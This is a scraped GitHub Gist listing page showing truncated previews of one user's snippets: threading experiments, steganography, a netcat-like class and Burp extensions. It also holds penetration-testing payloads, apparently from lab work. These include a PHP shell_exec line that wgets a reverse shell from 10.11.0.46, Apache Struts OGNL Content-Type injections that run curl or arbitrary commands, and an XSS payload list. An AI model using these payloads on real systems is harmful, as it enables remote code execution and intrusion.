Jimmy jimmy-ly00
jimmy-ly00
/ 1.c
Last active
June 16, 2017 11:41
Two experimental examples of dynamically creating threading per function call
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Takes input and split messages into 5 bytes. Delay each message per thread with known number of messages. Potentially | |
| // could be used as a stop-n-go mixer with an exponential distributed delay | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <pthread.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| struct delay_args { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import random | |
| from math import log, exp | |
| import string | |
| from gevent import sleep, spawn, joinall, wait | |
| from gevent.threadpool import ThreadPool | |
| def random_string(): | |
| digits = "".join( [random.choice(string.digits) for i in xrange(8)] ) | |
| chars = "".join( [random.choice(string.letters) for i in xrange(10)] ) |
jimmy-ly00
/ Least Significant Bit (simple method)
Created
September 7, 2017 12:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| with open("sample.bmp", "rb") as file: | |
| data = file.read() | |
| bits = "" | |
| for c in data: | |
| lsb = str(c & 0x1) | |
| bits += lsb |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If you have access to executing php (and maybe LFI to visit the .php) e.g. phpLiteAdmin, but it only accepts one line so you cannot use the pentestmonkey php-reverse-shell.php | |
| 1. Use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet in place of the one liner | |
| <?php echo shell_exec("[INSERT ONE LINER");?> | |
| 2. Guess programs on machine and use LFI to visit file | |
| <?php echo shell_exec("/usr/local/bin/wget http://10.11.0.46:8000/php-reverse-shell.php -O /var/tmp/shell.php 2>&1");?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Content-Type: application/x-www-form-urlencoded%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('Jimmy',3195*5088)}.multipart/form-data | |
| Content-Type: application/x-www-form-urlencoded %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec('curl http://IP'))} | |
| Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org |
jimmy-ly00
/ xss.txt
Last active
January 17, 2021 17:06
XSS payload (taken from: https://sql--injection.blogspot.co.uk/p/blog-page_80.html + other gist + some of my own)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script> | |
| "/><script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script> | |
| "<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script> | |
| onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | |
| /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/" /* | |
| /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/" /* | |
| javascript:alert()//<svg/onload=alert()>'-alert("-alert()-")-' | |
| " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> | |
| <button ' onclick=alert(1)//>*/alert(1)// | |
| " onclick=alert(1)//<button ' onclick=alert()//> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| class Netcat: | |
| """ Python 'netcat like' module """ | |
| def __init__(self, ip, port): | |
| self.buff = "" | |
| self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aes-128-cbc | |
| aes-128-cfb | |
| aes-128-cfb1 | |
| aes-128-cfb8 | |
| aes-128-ctr | |
| aes-128-ecb | |
| aes-128-ofb | |
| aes-192-cbc | |
| aes-192-cfb | |
| aes-192-cfb1 |
jimmy-ly00
/ burp-digest-hash.py
Created
March 10, 2021 16:32
Burp extension to add a digest header with custom hashing of the bearer token header and request body (parameters). E.g. Digest: SHA512(Bearer Token Value + Parameters)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from burp import IBurpExtender | |
| """ | |
| Name: Digest Hash Header | |
| Version: 0.0.1 | |
| Date: 10/03/2021 | |
| Author: Jimmy Ly | |
| Github: https://github.com/jimmy-ly00 | |
| Description: This plugin adds headers useful for XXX | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from burp import IBurpExtender | |
| """ | |
| Name: External Crypto Header | |
| Version: 0.0.1 | |
| Date: 10/03/2021 | |
| Author: Jimmy Ly | |
| Github: https://github.com/jimmy-ly00 | |
| Description: This plugin adds headers useful for XXX | |
| """ |
OlderNewer